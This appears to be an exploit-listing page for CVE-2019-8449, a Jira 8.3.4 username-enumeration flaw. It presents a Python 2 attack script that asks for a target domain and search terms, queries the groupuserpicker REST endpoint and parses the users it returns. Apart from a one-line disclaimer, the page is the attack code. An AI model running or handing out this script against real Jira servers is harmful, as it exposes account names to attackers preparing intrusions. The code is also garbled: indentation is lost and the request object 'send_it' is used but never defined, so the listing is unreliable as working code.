Jira 8.3.4 information disclosure (username enumeration) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-02-03 |
Type : webapps |
Platform : java
This exploit / vulnerability Jira 8.3.4 information disclosure (username enumeration) is for educational purposes only and if it is used you will do on your own risk!
class CVE_2019_8449:
def ask_for_domain(self):
domain = raw_input("[>] Enter the domain of Jira instance: => ")
if domain == "":
print("\n[-] ERROR: domain is required\n")
self.ask_for_domain()
self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)
def ask_for_query(self):
self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
if self.query == "":
print("\n[-] ERROR: The query parameter is required\n")
self.ask_for_query()
maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")
try:
response = send_it.json()
except:
print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
quit()